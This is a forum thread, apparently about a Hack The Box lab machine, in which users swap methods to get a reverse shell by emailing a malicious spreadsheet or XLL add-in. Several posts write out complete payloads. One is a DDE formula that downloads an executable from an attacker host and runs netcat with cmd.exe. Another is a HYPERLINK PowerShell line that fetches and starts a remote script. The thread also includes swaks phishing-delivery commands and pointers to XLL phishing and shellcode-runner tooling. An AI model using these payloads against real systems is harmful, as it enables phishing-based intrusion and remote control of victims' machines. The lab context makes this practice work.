[osamy7593]

guys put this in the first line in excel file after that test on ur windows after update the security in excel settings u will get a rev shell
cmd|'/C curl -v http://192.168.1.16:8000/ncsec.exe --output ncsec.exe'!nm.A1&cmd|'/C ncsec.exe -nv 192.168.1.16 4444 -e cmd.exe'!nm.A1but when i send it to accounts i don't get
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @/home/o/Downloads/sh.xlsx --server 10.10.11.21 --port 25

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[osamy7593]

echo "dummy content" > ~/HTB/addin.xll

How did they create the .xll file?

the content like this ?
cmd|'/C curl -v http://192.168.1.16:8000/ncsec.exe --output ncsec.exe'!nm.A1&cmd|'/C ncsec.exe -nv 192.168.1.16 4444 -e cmd.exe'!nm.A1

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[Kr4t0s4s]

Hello guys, was working on it and saw that macros were disabled here, so I think things like cmd won't work in the excel file. Done some search and saw that "=HYPERLINK('some command')" can work without having macros enabled, I'll try on my windows with a command like "=HYPERLINK("powershell -Command \"Invoke-WebRequest -Uri 'http://IP_ADRESS:PORT/shell.ps1' -OutFile 'C:\Users\Public\shell.ps1'; Start-Process 'C:\Users\Public\shell.ps1'\"")". Can you too ?

[standby123]

i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...

XLL works thanks man 
Use https://github.com/Octoberfest7/XLL_Phishing instead

[imassxck]

i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...

XLL works thanks man 
Use https://github.com/Octoberfest7/XLL_Phishing instead

x64?

[standby123]

i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...

XLL works thanks man 
Use https://github.com/Octoberfest7/XLL_Phishing instead

x64?

Yes and include the required libs and add your shellcode in runner function

[bmoon10]

well here are other pointers on building a xll file

https://whichbuffer.medium.com/macro-4-0...3c3a0fa697
https://github.com/moohax/xllpoc

[imassxck]

i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...

XLL works thanks man 
Use https://github.com/Octoberfest7/XLL_Phishing instead

x64?

Yes and include the required libs and add your shellcode in runner function

Thanks i got shell
but shell dies quickly.
i used Reverse Shell Generator PowerShell #3 Base64

may you teach me your rev shell ?

[osamy7593]

well here are  other pointers on building a xll file

https://whichbuffer.medium.com/macro-4-0...3c3a0fa697
https://github.com/moohax/xllpoc

 u explain how to get xll from this i can't understand

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[standby123]

i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...

XLL works thanks man 
Use https://github.com/Octoberfest7/XLL_Phishing instead

x64?

Yes and include the required libs and add your shellcode in runner function

Thanks i got shell
but shell dies quickly.
i used Reverse Shell Generator PowerShell #3 Base64

may you teach me your rev shell ?

Use metasploit